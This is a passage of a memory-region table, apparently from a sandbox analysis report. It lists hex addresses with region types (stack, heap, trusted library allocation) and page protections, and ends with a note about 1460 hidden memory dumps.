stack
page read and write
5DAC000
trusted library allocation
page read and write
86F1000
heap
page read and write
82B2000
heap
page read and write
5338000
trusted library allocation
page read and write
767F000
trusted library allocation
page read and write
6DE7000
heap
page read and write
81ED000
stack
page read and write
32FD000
trusted library allocation
page execute and read and write
4B14000
trusted library allocation
page read and write
9DD000
stack
page read and write
750D000
stack
page read and write
7428000
heap
page read and write
83A8000
heap
page read and write
470000
heap
page read and write
2FAD000
heap
page read and write
728E000
heap
page read and write
59D4000
trusted library allocation
page read and write
7650000
trusted library allocation
page read and write
76A0000
heap
page read and write
7DA8000
heap
page read and write
727E000
stack
page read and write
81C0000
trusted library allocation
page read and write
5128000
trusted library allocation
page read and write
4B17000
trusted library allocation
page read and write
8212000
heap
page read and write
8877000
trusted library allocation
page read and write
8778000
heap
page read and write
83EA000
heap
page read and write
There are 1460 hidden memdumps, click here to show them.